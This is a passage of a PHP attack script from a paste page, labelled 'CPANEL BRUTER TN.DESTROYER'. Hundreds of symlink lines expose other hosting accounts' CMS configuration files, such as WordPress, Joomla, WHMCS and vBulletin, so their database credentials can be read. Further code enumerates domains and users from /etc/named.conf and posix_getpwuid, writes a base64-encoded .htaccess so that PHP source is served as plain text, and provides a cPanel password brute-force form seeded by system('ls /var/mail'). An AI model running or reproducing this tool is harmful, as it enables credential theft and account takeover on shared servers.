  269.             symlink('/home2/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  270.             symlink('/home3/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  271.             symlink('/home3/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  272.             symlink('/home3/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  273.             symlink('/home3/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
  274.             symlink('/home3/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  275.             symlink('/home3/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  276.             symlink('/home3/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  277.             symlink('/home3/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  278.             symlink('/home3/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  279.             symlink('/home3/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  280.             symlink('/home3/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  281.             symlink('/home3/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  282.             symlink('/home3/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  283.             symlink('/home3/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  284.             symlink('/home3/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  285.             symlink('/home3/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  286.             symlink('/home3/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  287.             symlink('/home3/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  288.             symlink('/home3/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  289.             symlink('/home3/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  290.             symlink('/home3/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  291.             symlink('/home3/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  292.             symlink('/home3/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  293.             symlink('/home3/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  294.             symlink('/home3/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  295.             symlink('/home3/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  296.             symlink('/home3/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  297.             symlink('/home3/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  298.             symlink('/home3/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  299.             symlink('/home3/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  300.             symlink('/home3/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  301.             symlink('/home3/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  302.             symlink('/home3/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  303.             symlink('/home3/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  304.             symlink('/home3/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  305.             symlink('/home3/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  306.             symlink('/home3/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  307.             symlink('/home3/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  308.             symlink('/home3/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  309.             symlink('/home3/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  310.             symlink('/home3/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
  311.             symlink('/home3/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  312.             symlink('/home4/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  313.             symlink('/home4/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  314.             symlink('/home4/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  315.             symlink('/home4/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
  316.             symlink('/home4/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  317.             symlink('/home4/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  318.             symlink('/home4/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  319.             symlink('/home4/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  320.             symlink('/home4/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  321.             symlink('/home4/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  322.             symlink('/home4/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  323.             symlink('/home4/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  324.             symlink('/home4/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  325.             symlink('/home4/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  326.             symlink('/home4/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  327.             symlink('/home4/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  328.             symlink('/home4/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  329.             symlink('/home4/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  330.             symlink('/home4/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  331.             symlink('/home4/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  332.             symlink('/home4/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  333.             symlink('/home4/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  334.             symlink('/home4/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  335.             symlink('/home4/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  336.             symlink('/home4/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  337.             symlink('/home4/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  338.             symlink('/home4/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  339.             symlink('/home4/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  340.             symlink('/home4/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  341.             symlink('/home4/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  342.             symlink('/home4/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  343.             symlink('/home4/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  344.             symlink('/home4/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  345.             symlink('/home4/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  346.             symlink('/home4/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  347.             symlink('/home4/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  348.             symlink('/home4/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  349.             symlink('/home4/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  350.             symlink('/home4/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  351.             symlink('/home4/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  352.             symlink('/home4/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
  353.             symlink('/home4/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  354.             symlink('/home5/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  355.             symlink('/home5/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  356.             symlink('/home5/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  357.             symlink('/home5/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
  358.             symlink('/home5/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  359.             symlink('/home5/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  360.             symlink('/home5/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  361.             symlink('/home5/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  362.             symlink('/home5/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  363.             symlink('/home5/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  364.             symlink('/home5/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  365.             symlink('/home5/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  366.             symlink('/home5/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  367.             symlink('/home5/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  368.             symlink('/home5/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  369.             symlink('/home5/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  370.             symlink('/home5/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  371.             symlink('/home5/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  372.             symlink('/home5/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  373.             symlink('/home5/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  374.             symlink('/home5/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  375.             symlink('/home5/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  376.             symlink('/home5/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  377.             symlink('/home5/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  378.             symlink('/home5/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  379.             symlink('/home5/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  380.             symlink('/home5/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  381.             symlink('/home5/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  382.             symlink('/home5/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  383.             symlink('/home5/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  384.             symlink('/home5/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  385.             symlink('/home5/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  386.             symlink('/home5/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  387.             symlink('/home5/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  388.             symlink('/home5/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  389.             symlink('/home5/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  390.             symlink('/home5/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  391.             symlink('/home5/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  392.             symlink('/home5/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  393.             symlink('/home5/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  394.             symlink('/home5/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
  395.             symlink('/home5/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  396.             symlink('/home6/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  397.             symlink('/home6/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  398.             symlink('/home6/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  399.             symlink('/home6/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
  400.             symlink('/home6/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  401.             symlink('/home6/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  402.             symlink('/home6/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  403.             symlink('/home6/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  404.             symlink('/home6/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  405.             symlink('/home6/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  406.             symlink('/home6/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  407.             symlink('/home6/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  408.             symlink('/home6/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  409.             symlink('/home6/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  410.             symlink('/home6/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  411.             symlink('/home6/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  412.             symlink('/home6/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  413.             symlink('/home6/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  414.             symlink('/home6/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  415.             symlink('/home6/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  416.             symlink('/home6/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  417.             symlink('/home6/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  418.             symlink('/home6/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  419.             symlink('/home6/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  420.             symlink('/home6/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  421.             symlink('/home6/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  422.             symlink('/home6/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  423.             symlink('/home6/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  424.             symlink('/home6/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  425.             symlink('/home6/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  426.             symlink('/home6/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  427.             symlink('/home6/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  428.             symlink('/home6/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  429.             symlink('/home6/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  430.             symlink('/home6/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  431.             symlink('/home6/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  432.             symlink('/home6/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  433.             symlink('/home6/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  434.             symlink('/home6/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  435.             symlink('/home6/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  436.             symlink('/home6/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
  437.             symlink('/home6/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  438.             symlink('/home7/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  439.             symlink('/home7/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  440.             symlink('/home7/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  441.             symlink('/home7/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
  442.             symlink('/home7/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  443.             symlink('/home7/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  444.             symlink('/home7/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  445.             symlink('/home7/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  446.             symlink('/home7/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  447.             symlink('/home7/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  448.             symlink('/home7/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  449.             symlink('/home7/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  450.             symlink('/home7/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  451.             symlink('/home7/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  452.             symlink('/home7/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  453.             symlink('/home7/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  454.             symlink('/home7/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  455.             symlink('/home7/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  456.             symlink('/home7/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  457.             symlink('/home7/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  458.             symlink('/home7/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  459.             symlink('/home7/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  460.             symlink('/home7/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  461.             symlink('/home7/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  462.             symlink('/home7/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  463.             symlink('/home7/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  464.             symlink('/home7/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  465.             symlink('/home7/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  466.             symlink('/home7/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  467.             symlink('/home7/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  468.             symlink('/home7/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  469.             symlink('/home7/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  470.             symlink('/home7/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  471.             symlink('/home7/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  472.             symlink('/home7/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  473.             symlink('/home7/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  474.             symlink('/home7/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  475.             symlink('/home7/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  476.             symlink('/home7/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  477.             symlink('/home7/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  478.             symlink('/home7/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
  479.             symlink('/home7/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  480.         }
  481.         $d0mains = @file("/etc/named.conf");
  482.         if ($d0mains) {
  483.             mkdir($fn);
  484.             chdir($fn);
  485.             foreach ($d0mains as $d0main) {
  486.                 if (eregi("zone", $d0main)) {
  487.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
  488.                     flush();
  489.                     if (strlen(trim($domains[1][0])) > 2) {
  490.                         $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
  491.                         syml($user['name'], $domains[1][0]);
  492.                     }
  493.                 }
  494.             }
  495.             echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><center>[Done] : <span style='color:" . $color[0] . ";'>Successfull, </span> <a href=$fn/ style='text-decoration:none;'><input type='button' value='Go !'></a> <a href=" . $_SERVER['PHP_SELF'] . " style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
  496.         } else {
  497.             mkdir($fn);
  498.             chdir($fn);
  499.             $temp = "";
  500.             $val1 = 0;
  501.             $val2 = 1000;
  502.             for (;$val1 <= $val2;$val1++) {
  503.                 $uid = @posix_getpwuid($val1);
  504.                 if ($uid) $temp.= join(':', $uid) . "
  505. ";
  506.             }
  507.             echo '<br/>';
  508.             $temp = trim($temp);
  509.             $file5 = fopen("test.txt", "w");
  510.             fputs($file5, $temp);
  511.             fclose($file5);
  512.             $htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
  513. aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
  514. biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
  515. ';
  516.             $file = fopen(".htaccess", "w+");
  517.             $write = fwrite($file, base64_decode($htaccess));
  518.             $file = fopen("test.txt", "r") or exit("Unable to open file!");
  519.             while (!feof($file)) {
  520.                 $s = fgets($file);
  521.                 $matches = array();
  522.                 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  523.                 $matches = str_replace("home/", "", $matches[1]);
  524.                 if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
  525.                 syml($matches, $matches);
  526.             }
  527.             fclose($file);
  528.             echo "</table>";
  529.             unlink("test.txt");
  530.             echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><center>[Done] : <span style='color:" . $color[0] . ";'>Successfull, </span> <a href=$fn/ style='text-decoration:none;'><input type='button' value='Go !'></a> <a href=" . $_SERVER['PHP_SELF'] . " style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
  531.         }
  532.         exit;
  533.     }
  534. ?>
  535. <form method="POST" target="_blank">
  536. <input name="page" type="hidden" value="find">                     
  537.     <table width="550" cellpadding="3" cellspacing="1" align="center" style="border:3px solid <?php echo $color[0]; ?>;" border=1>
  538.     <tr>
  539.         <td valign="top" colspan="6" style="border-bottom:2px solid <?php echo $color[0]; ?>;padding:10px;"><center><span style="font-family: Verdana;font-size:30px;font-weight:bold;text-shadow: <?php echo $color[0]; ?> 0.0em 0.0em 0.2em;">CPANEL BRUTER TN.DESTROYER</span><br>
  540.         </center></td>
  541.     </tr>
  542.     <tr>
  543.     <td valign="top" style="width: 200px;"><span class="label">Safe Mode</span></td>
  544.     <td valign="top" colspan="5"><span class="label">
  545. <?php
  546.     $safe_mode = ini_get('safe_mode');
  547.     if ($safe_mode == '1') {
  548.         echo 'ON';
  549.     } else {
  550.         echo 'OFF';
  551.     }
  552. ?> 
  553.     </span>
  554.     </td>
  555.     </tr>
  556. </form>
  557.     <tr>
  558.     <td valign="top"><span class="label">Disable Function</span></td>
  559.     <td valign="top" colspan="5">
  560. <form method="POST" target="_blank">
  561. <input name="matikan" type="hidden" value="sekatan">                       
  562. <?php
  563.     if ('' == ($func = @ini_get('disable_functions'))) {
  564.         echo "<font color='" . $color[0] . "' style='position:absolute;font-size:13px;'>No Security for Function</font>";
  565.         echo '<tr><td valign="top"><span class="label">Bypass</span></td><td valign="top" colspan="5"><font color="' . $color[0] . '" style="font-size:13px;">Success</font></td></tr>';
  566.     } else {
  567.         echo '<script>alert("    Please See Below And Press      
  568.      --->| Click Here First! |<---  ");</script>';
  569.         echo "<font color=#FF0000 style='position:relatif;font-size:13px;'>$func</font>";
  570.         echo '<tr><td valign="top"><span class="label">Bypass</span></td><td valign="top" colspan="5"><input type="submit" value="Click Here First!"></td></tr>';
  571.     }
  572. ?></form></td>
  573. <form method="POST" target="_blank">
  574. <input name="mendapatkan" type="hidden" value="passwd">                    
  575.     <tr>
  576.     <td valign="top"><span class="label">Get Config</span></td>
  577.     <td valign="top"><input size="35" name="foldername" type="text" value="Config-TNDESTROYER"> <input type="submit" value="Submit"></td>
  578.     </td>
  579.     </tr>
  580. </form>
  581. <form method="POST" target="_blank">
  582. <input name="pass" type="hidden" value="password">                     
  583.     <tr>
  584.     <td valign="top"><span class="label">Get Passlist</span></td>
  585.     <td valign="top"><input size="35" name="url" type="text" value="Put config directory URL"> <input type="submit" value="Submit"></td>
  586.     </td>
  587.     </tr>
  588. </form>
  589.     <tr>
  590.     <td valign="top">
  591.     <span class="label">Userlist</span></td>
  592.     <td valign="top" colspan="5"><textarea cols="40" rows="7" name="usernames"><?php system('ls /var/mail'); ?></textarea></td>
  593.     </tr>
  594.     <tr>
  595.     <td valign="top">
  596.     <span class="label">Passlist</span></td>
  597.     <td valign="top"colspan="5"><textarea cols="40" rows="7" name="passwords"></textarea></td>
  598.     </tr>
  599.     <tr>
  600.     <td valign="top">
  601.     <span class="label">Type</span></td>
  602.     <td valign="top" colspan="5">
  603.     <input type="radio" name="type" value="simple" checked="checked"><span class="label">Simple</span>
  604.     <input type="radio" name="type" value="passwd"><span class="label">/etc/passwd</span>
  605.     </td>
  606.     </tr>
  607.     <tr>
  608.     <td valign="top" colspan="6"><center><input type="submit" value="Submit"></center></td>
  609.     </tr>
  610. </form>
  611. <tr>
  612. <td valign="top" colspan="6" style="border-top:2px solid <?php echo $color[0]; ?>;"><center><font face="Verdana" color="#e1e1e1" size="2" style="margin:7px;">Allright Reserved &copy; TN.DESTROYER | RST</font></center></td>
  613. </tr>
  614. </table>
  615. </body>
  616. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement